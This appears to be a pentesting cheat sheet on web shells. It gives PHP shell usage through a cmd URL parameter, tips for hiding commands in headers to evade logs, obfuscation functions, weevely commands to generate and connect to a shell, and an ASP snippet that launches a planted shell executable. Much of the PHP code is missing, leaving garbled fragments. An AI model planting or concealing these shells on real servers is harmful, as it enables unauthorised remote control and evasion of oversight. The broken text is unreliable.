# Web Shells You have access to different kinds of webshells on Kali here: ``` /usr/share/webshells ``` ### PHP This code can be injected into pages that use php. ``` # Execute one command # Take input from the url paramter. shell.php?cmd=whoami # The same but using passthru # For shell_exec to output the result you need to echo it # Exec() does not output the result without echo, and only output the last line. So not very useful! # Instead to this if you can. It will return the output as an array, and then print it all. # preg_replace(). This is a cool trick # Using backticks $output"; ?> # Using backticks ``` You can then call then execute the commands like this: ``` http://192.168.1.103/index.php?cmd=pwd ``` #### Make it stealthy We can make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters. The use tampterdata or burpsuite to insert the commands. Or just netcat or curl. ``` # I have had to use this one ``` #### Obfuscation The following functions can be used to obfuscate the code. ``` eval() assert() base64() gzdeflate() str_rot13() ``` #### Weevely - Incredible tool! Using weevely we can create php webshells easily. ``` weevely generate password /root/webshell.php ``` Not we execute it and get a shell in return: ``` weevely "http://192.168.1.101/webshell.php" password ``` ### ASP ``` <% Dim oS On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True) %> ``` ### References * *